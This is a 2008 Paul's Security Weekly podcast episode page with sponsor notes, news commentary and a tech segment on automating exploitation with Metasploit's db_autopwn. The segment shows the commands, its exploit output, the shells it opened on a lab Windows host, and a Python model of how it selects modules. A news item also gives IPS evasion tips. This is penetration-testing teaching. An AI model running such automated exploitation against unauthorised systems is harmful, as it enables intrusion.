Episode124

From Paul's Security Weekly

Sponsors

Core Security

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.

Tenable Network Security

This podcast is also sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins and compliance checks. Tenable – Unified Security Monitoring!

Astaro

Astaro offers the most complete and easy to use Internet security appliances available. The products combine best of breed applications, the proven quality of Linux and enterprise level performance, providing the latest protection with the best total cost of ownership. All products are available as software, hardware or virtual appliances, which allows users the flexibility to meet a wide variety of deployment scenarios.

One of the best things about Astaro is that it offers its products completely free for home use. All enterprise features and all subscriptions, including virus scanning, web content filtering, email filtering and VPN clients, are available in the home license for no cost. All you have to do is visit www.astaro.com, register, download the software and obtain the key, which protects up to 10 IPs. There are no sales people to talk to, no payment information to enter—it’s just free. Again, visit www.astaro.com for more information or to download the product and free home user license.

Announcements & Shameless Plugs

Live from the PaulDotCom Studios Welcome to PaulDotCom Security Weekly, Episode 124 for September 25th, 2008

Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.

  • PaulDotCom SANS Click-Through - Go there, register for fabulous SANS training! Go now!
  • ICE (Integrated Cyber Exercise) - Oct. 1-3 at SANS Las Vegas! - Now featuring observers from the Air Force Cyber Command (P), Air Force Information Operations Center and United States Air Force Warfare Center. Paul and Larry have team names: The Steadfast Buccaneers and The Network Ninja Assassins!
  • NS2008! Paul giving keynote: Things That Go Bump In The Network: Embedded Device (In)Security and teaching SEC535, Network Security Projects Using Hacked Wireless Routers! Don't forget our live podcast immediately following!
  • ChicagoCon - October 27 - November 1, Talks by Ed Skoudis, Gregory Conti West Point, Author of "Security Data Visualization", Daniel V. Hoffman CTO SMobile Systems, EH-Net Columnist, Billy Rios/John Walton Microsoft Pen Testers (Blue Hat)

Episode Media

mp3 pt 1

mp3 pt 2

Tech Segment: Automating Exploitation With Metasploit's db_autopwn

There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in or the inside looking out. I like to automate this process as far as I can, then use manual methods to verify the results. For example, let's say I want to quickly verify the results of an Nmap or Nessus scan and see whether any of the Windows hosts are vulnerable to common Microsoft exploits. Metasploit can do this: its db_autopwn command reads the scan data from the database and launches the matching exploits, which for Windows hosts covers the common remotely exploitable vulnerabilities.

The first step is to load a database plugin in msfconsole (db_sqlite3 here) and create a database to hold the scan data:

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create mynetwork
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: mynetwork
msf >

From here, I have several options. I can import the results of a previous Nmap scan, provided it was saved in XML format (-oX):

msf > db_import_nmap_xml mynetwork.xml

Or, using the db_nmap command, I can run Nmap directly from Metasploit and have the results populate the database as the scan finishes:

msf > db_nmap -sS -T4 -O 192.168.1.0/24
[*] exec: "/usr/local/bin/nmap" "-sS" "-T4" "-O" "192.168.1.0/24" "-oX" "/tmp/dbnmap.29736.0"
NMAP: 
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2008-09-25 09:05 EDT

I can now launch exploits against the known targets, but only by open port: Nmap tells us which ports are open, not which services are actually vulnerable, so every module whose target port matches an open port gets tried:

msf > db_autopwn -p -e

-p selects modules according to open port, and -e actually runs the "exploit" command for each match (without -e nothing is launched; -t just lists the matching modules so you can review the plan first, and -r swaps the default bind shell for a reverse shell, which matters when the targets sit behind a firewall). When I do this, I give Metasploit a lot of work to do:

<snip>
[*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...
[*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80...
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Started bind handler
[*] Trying target BadBlue 2.72b Universal...
[*] Server may not be vulnerable.
[*] Calling the vulnerable function...
[*] Successfully removed /config/password.txt
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80...
[*] Started bind handler
<snip>

727 possible exploit/target pairs, nearly all of them fired blind at services that are not vulnerable, and it took a while. So I ran Nessus against my network instead, then imported the Nessus results in NBE format:

msf > db_import_nessus_nbe windows.nbe

Now I run db_autopwn and tell it to select modules by the vulnerability references in the Nessus findings rather than by port:

msf > db_autopwn -x -e

This produces a much shorter run and much better results: four shells on 192.168.1.52 instead of hundreds of blind launches:

msf > sessions -l

Active sessions
===============

  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell  192.168.1.204:60530 -> 192.168.1.52:37541  
  2   Command shell  192.168.1.204:61047 -> 192.168.1.52:13917  
  3   Command shell  192.168.1.204:61306 -> 192.168.1.52:6112   
  4   Command shell  192.168.1.204:61350 -> 192.168.1.52:5646   

msf > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
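
To make the difference between the two selection modes concrete, here is an added example, not code from the show or from Metasploit, that re-implements the two matching rules in Python over constructed input: a fragment of Nmap -oX output, a few Nessus .nbe rows, and a five-entry stand-in for the exploit catalogue. The NBE layout (pipe-separated "results" rows with "CVE :" references inside the plugin text), the 9990x plugin IDs and the CVE-to-module pairings are assumptions of the example; check the pairings with "info <module>" in msfconsole before relying on them.

```python
"""Toy model of db_autopwn's "-p" (by open port) and "-x" (by vulnerability
reference) module selection, run over constructed scan data.
Added example; not code from the show notes or from Metasploit."""
import re
import xml.etree.ElementTree as ET

# Constructed Nmap -oX output (what db_nmap and db_import_nmap_xml consume).
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="4.76" args="nmap -sS -T4 -O 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.52" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="135"><state state="filtered"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="up"/><address addr="192.168.1.226" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports>
  </host>
</nmaprun>"""

# Constructed Nessus NBE rows. Assumed layout (classic NBE):
#   results|subnet|host|service (port/proto)|plugin id|severity|plugin text
# where the plugin text carries literal "\n" escapes and "CVE : ..." lines.
# Plugin IDs 9990x are placeholders, not real Nessus plugin numbers.
NESSUS_NBE = """timestamps|||scan_start|Thu Sep 25 09:05:00 2008|
results|192.168.1|192.168.1.52|microsoft-ds (445/tcp)|99901|Security Hole|Synopsis : LSASS remote overflow (MS04-011)\\nCVE : CVE-2003-0533
results|192.168.1|192.168.1.52|http (80/tcp)|99902|Security Note|HTTP server type and version : BadBlue/2.72
results|192.168.1|192.168.1.226|http (80/tcp)|99903|Security Hole|Synopsis : IIS .printer ISAPI overflow (MS01-023)\\nCVE : CVE-2001-0241
"""

# Constructed stand-in for the exploit catalogue: (module, target port, refs).
# Module names are from the Metasploit 3.x tree; the CVE pairings are from
# memory and should be confirmed with "info <module>" before use.
CATALOGUE = [
    ("exploit/windows/http/badblue_passthru", 80, {"CVE-2007-6377"}),
    ("exploit/windows/iis/ms01_023_printer", 80, {"CVE-2001-0241"}),
    ("exploit/windows/dcerpc/ms03_026_dcom", 135, {"CVE-2003-0352"}),
    ("exploit/windows/smb/ms04_011_lsass", 445, {"CVE-2003-0533"}),
    ("exploit/windows/smb/ms06_040_netapi", 445, {"CVE-2006-3439"}),
]

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
NBE_SERVICE_RE = re.compile(r"\((\d+)/(tcp|udp)\)")


def parse_nmap_xml(xml_text):
    """Return {host: set(open TCP ports)}; closed/filtered ports are dropped."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        open_ports = set()
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
                open_ports.add(int(port.get("portid")))
        hosts[addr] = open_ports
    return hosts


def parse_nbe(nbe_text):
    """Return {host: {(port, cve), ...}} from the 'results' rows of an NBE file."""
    vulns = {}
    for line in nbe_text.splitlines():
        fields = line.split("|")
        if fields[0] != "results" or len(fields) < 7:
            continue
        host, service, text = fields[2], fields[3], fields[6]
        m = NBE_SERVICE_RE.search(service)
        if not m:
            continue
        port = int(m.group(1))
        for cve in CVE_RE.findall(text):  # a row without a CVE contributes nothing
            vulns.setdefault(host, set()).add((port, cve))
    return vulns


def select_by_port(catalogue, hosts):
    """db_autopwn -p: every module whose port is open on the host is a candidate."""
    plan = []
    for host, ports in sorted(hosts.items()):
        for module, port, _refs in catalogue:
            if port in ports:
                plan.append((module, host, port))
    return plan


def select_by_ref(catalogue, vulns):
    """db_autopwn -x: only modules whose references match a reported finding."""
    plan = []
    for host, findings in sorted(vulns.items()):
        for port, cve in sorted(findings):
            for module, _port, refs in catalogue:
                if cve in refs:
                    plan.append((module, host, port))
    return plan


if __name__ == "__main__":
    hosts = parse_nmap_xml(NMAP_XML)
    vulns = parse_nbe(NESSUS_NBE)
    for label, plan in (("-p (by open port)", select_by_port(CATALOGUE, hosts)),
                        ("-x (by reference)", select_by_ref(CATALOGUE, vulns))):
        print(f"{label}: {len(plan)} launches")
        for module, host, port in plan:
            print(f"  {module} -> {host}:{port}")
```

Run it and the port-based plan fires six module/host pairs (four of them at 192.168.1.52, two at 192.168.1.226, and nothing at the filtered port 135), while the reference-based plan fires two, one per confirmed finding. The Nmap data alone cannot say whether the host answering on 445 is unpatched, which is why the segment's first run was mostly noise. The same logic also shows the trade-off in the other direction: the BadBlue banner row carries no CVE, so under -x it matches nothing even though -p would have tried the BadBlue module.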

Interview - Core Security Technologies Product Update

Stories Of Interest

PDF Attack Packs - [Larry] - Secure Computing has discovered a collection of PDF attacks in the wild. What does this mean? Patch your Adobe Reader (and other readers too!). I've been working on some metadata stuff (go figure), and it is fairly easy to determine OS, PDF generator and version, as well as timeline. It will be real easy for an attacker to determine this info and deliver an appropriate attack.

Xerox taking printer security seriously? - [Larry] - This is a refreshing turn of events. Xerox announced a vulnerability in the WorkCentre multifunction devices, as the Samba server contained on them had a remote code execution condition (as seen with some of the Samba tree). They've acknowledged it, and provided a software update. Now the next challenge - how do you get them patched? There is no auto update for printers.

Aruba Mobility Controller Vuln? - [Larry] - Aruba includes a default X.509 certificate in their mobility controller, which is the same on every device. Of course! Aruba responds with verbiage from the system documentation and from the support website, indicating that the cert should be changed and that it is there for demonstration purposes. They even advise that a new cert is a good thing to do. Now, I don't see this as a huge issue - almost all vendors that deliver appliances that I know of either pre-populate a cert or generate a self-signed one at install. At that point, which is the lesser of two evils? You should always be putting up good certs on your boxes, but we all know that many don't and just run with the default! At least Aruba clearly advises customers to change the cert, and gives them the ability to do so - unlike, say, MS RDP?

Nessus Released Virtual Appliance - [PaulDotCom] - One stop shopping vulnerability scanner. This is really smart; virtualization is where it's at, and it's important to be flexible. Many vuln scan vendors offer traditional software and even hardware solutions, but I believe that a VM is the best option in many cases. Why? Flexibility, primarily: being able to stand up a Nessus scanner on any VM is handy, for the pen tester especially.

Cisco releases a ton of Patches - [PaulDotCom] - While this is your everyday, average vulnerability announcement, don't forget a couple of things: 1) Cisco routers run the Internet (primarily) 2) We talked a few weeks ago about shell code being available 3) Since they are embedded devices, most people don't patch right away (maintenance can be tricky, even if you are redundant). 4) Many devices are exposed to the Internet because they are outside the firewall, by design. To me, this is a recipe for disaster...

IDS is not going to die, but when will people start actually using an IPS for prevention? - [PaulDotCom] - This heavily influenced study uncovered some interesting things.

  • Cisco is the IPS market leader, so to all blackhats and good intentioned security researchers, this is a good place to focus evasion efforts.
  • Even though deployed inline, most are not blocking any traffic - When will the business case for actually blocking traffic be made? Why is IPS so widely unsuccessful in the enterprise?
  • People don't update their filters! - This means that as an attacker, use the most recent versions of the exploit, maybe even the oldest, but stay away from anything in between. Not only use the latest exploits, but stay up-to-date with all of your tools that contain evasion techniques (a la exploit frameworks and payload generators).

Is manual compilation a problem? - [PaulDotCom] - While some say you will go blind, and others are convinced you will develop hair on your hands, is manual compilation a bad thing? I think it depends. I really try to stick to the package tree as best I can, but with so much software out there, it can be very hard, er, difficult. So, what to do? Most distributions have a "bleeding edge" tree that you can tie into, OS X keeps things separate (MacPorts installs in /opt/local/ for example), so there are some ways around it. Really and truly evaluate the need to install non-distribution maintained software, as it can come back to bite you in the end.

Porn Operators Hijack Pages on AARP Website - All I have to say is LOL. and there is a joke in here about male enhancement drugs, but I just can't come "UP" with one ;-)

10 Great Gadgets for Work and....HACKING! - [PaulDotCom] - Interesting little article describing some of the latest gadgets. I really want to test the security of these devices, fuzzing the wireless drivers, find CSRF holes in the web server, and maybe even a remote exploit (or two). So many things are wireless now! I mean, I scold people who discuss the Wifi SD card, but then I'm like that's kinda cool, I really want one, and the hacker in me wants to break it. There is really no point to this story, other than cool and hopefully some good things to come...

The Security Catalyst gets robbed - [Larry] - While on the road, their motorhome was broken into and computer gear stolen. Santa was very up front in stating that while they did practice a good deal of safe computing practices, there were still some data loss issues. I bring this up because, even as security pros, we make mistakes too! I for one had a Debian box on my home network (exposed to the internet too) that was behind on patches - including the Kaminsky DNS patch. It can happen to the best of us. The other thing to note - both of these happened at a "home" location, where your corporate workers may work from occasionally, with their corporate laptops. It's time to begin thinking about how to secure your mobile workforce while at home, if you haven't already. Why? Because you've done a great job on your security investments at your corporate offices, and the weakest link (both physically and technologically) is likely at the home office... see blog post and discussion for more.

Compliance Checklist != Security - [Larry] - No, it just means that you can pass an audit by demonstrating that you have stuff on the list, and not that you are following best practices. As an example, HIPAA specifies that sensitive data must be encrypted over a public network. At that, ROT13 would be acceptable! With PCI, they still appear to allow the use of WEP, which is acceptable under the checklist, but we all know WEP can be broken quite easily.

NeoPwn - [Larry] - Cool! A hacktop in a phone with Backtrack based on openmoko